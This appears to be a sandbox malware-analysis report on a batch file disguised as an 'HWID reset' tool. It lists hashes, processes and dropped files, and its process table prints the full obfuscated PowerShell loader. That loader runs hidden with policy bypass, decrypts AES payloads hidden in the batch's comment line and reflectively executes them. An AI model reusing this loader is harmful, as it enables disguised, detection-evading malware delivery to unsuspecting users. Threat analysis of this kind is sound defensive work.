File name: | HWID_reset.bat |
Full analysis: | https://app.any.run/tasks/0aff2fe3-8d06-4db9-9434-365ab8ee20eb |
Verdict: | Malicious activity |
Analysis date: | March 31, 2023, 19:04:28 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | text/x-msdos-batch |
File info: | DOS batch file, ASCII text, with very long lines, with CRLF line terminators |
MD5: | B317669D1B13FD244D6DB469FFB4678A |
SHA1: | 72FB4229EB8ABBD4419520C25747C4AE2444D4BF |
SHA256: | 0F43A57998B92E3FEEA1588CE654752015A76D0A2836F5F5A7A881AAC79ECDD1 |
SSDEEP: | 49152:zbb/+qPbGVOI7BHitJwuC8hkvCoAYjcqkxyBMLUCz2Imd7yftQMw652aSfonc8Vz:l |
PID | CMD | Path | Indicators | Parent process | |||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2640 | C:\Windows\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\HWID_reset.bat" " | C:\Windows\System32\cmd.exe | explorer.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
1660 | "HWID_reset.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function GkfuP($Ftrmo){ $iOgfS=[System.Security.Cryptography.Aes]::Create(); $iOgfS.Mode=[System.Security.Cryptography.CipherMode]::CBC; $iOgfS.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $iOgfS.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oRnKDTKRdNDuGPKLfcWbzG3E9QcwrbXFAbiLKtlmc6E='); $iOgfS.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HVOqeYeBr3FxS1if0oFPVw=='); $uMdzQ=$iOgfS.CreateDecryptor(); $return_var=$uMdzQ.TransformFinalBlock($Ftrmo, 0, $Ftrmo.Length); $uMdzQ.Dispose(); $iOgfS.Dispose(); $return_var;}function Zhioz($Ftrmo){ $fDpBd=New-Object System.IO.MemoryStream(,$Ftrmo); $SzAqa=New-Object System.IO.MemoryStream; $yjHXQ=New-Object System.IO.Compression.GZipStream($fDpBd, [IO.Compression.CompressionMode]::Decompress); $yjHXQ.CopyTo($SzAqa); $yjHXQ.Dispose(); $fDpBd.Dispose(); $SzAqa.Dispose(); $SzAqa.ToArray();}function XFWKq($Ftrmo,$xMhHA){ $swggP=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$Ftrmo); $AZbLL=$swggP.EntryPoint; $AZbLL.Invoke($null, $xMhHA);}$tzweI=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\admin\AppData\Local\Temp\HWID_reset.bat').Split([Environment]::NewLine);foreach ($hegGD in $tzweI) { if ($hegGD.StartsWith(':: ')) { $kPGxF=$hegGD.Substring(3); break; }}$gBDQy=[string[]]$kPGxF.Split('\');$yiobC=Zhioz (GkfuP ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($gBDQy[0])));$McZxl=Zhioz (GkfuP ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($gBDQy[1])));XFWKq $McZxl (,[string[]] (''));XFWKq $yiobC (,[string[]] ('')); | C:\Users\admin\AppData\Local\Temp\HWID_reset.bat.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 3762504530 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
|
PID | Process | Filename | Type | |
---|---|---|---|---|
1660 | HWID_reset.bat.exe | C:\Users\admin\AppData\Local\Temp\rleykjgn.fpx.psm1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B | |||
1660 | HWID_reset.bat.exe | C:\Users\admin\AppData\Local\Temp\mrxs4qre.ses.ps1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B | |||
2640 | cmd.exe | C:\Users\admin\AppData\Local\Temp\HWID_reset.bat.exe | executable | |
MD5:EB32C070E658937AA9FA9F3AE629B2B8 | SHA256:70BA57FB0BF2F34B86426D21559F5F6D05C1268193904DE8E959D7B06CE964CE |